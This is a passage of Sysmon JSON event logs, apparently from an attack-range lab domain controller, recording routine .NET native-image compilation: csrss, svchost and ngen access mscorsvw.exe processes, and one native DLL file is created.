C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-00101D0C0F00}","TargetProcessId":"2684","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7145,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-00101D0C0F00}\r\nTargetProcessId: 2684\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-00101D0C0F00}","TargetProcessId":"2684","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7146,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.668\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001022450E00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.668","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001022450E00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7147,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.668\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001022450E00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.668","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001022450E00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7148,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.668\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001022450E00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.668","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001022450E00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7149,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:45.715\r\nProcessGuid: {A837DB8D-0495-5F25-0000-00109F0F0F00}\r\nProcessId: 4972\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\136c-0\\PresentationFramework-SystemData.dll\r\nCreationUtcTime: 2020-08-01 05:58:45.715","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:45.715","ProcessGuid":"{A837DB8D-0495-5F25-0000-00109F0F0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\136c-0\\PresentationFramework-SystemData.dll","CreationUtcTime":"2020-08-01 05:58:45.715","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7150,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.746\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00100CCD0C00}\r\nTargetProcessId: 4460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.746","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00100CCD0C00}","TargetProcessId":"4460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7151,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.746\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00100CCD0C00}\r\nTargetProcessId: 4460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.746","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00100CCD0C00}","TargetProcessId":"4460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7152,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.746\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00100CCD0C00}\r\nTargetProcessId: 4460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.746","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00100CCD0C00}","TargetProcessId":"4460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7153,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.793\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-00102C170F00}\r\nTargetProcessId: 2436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 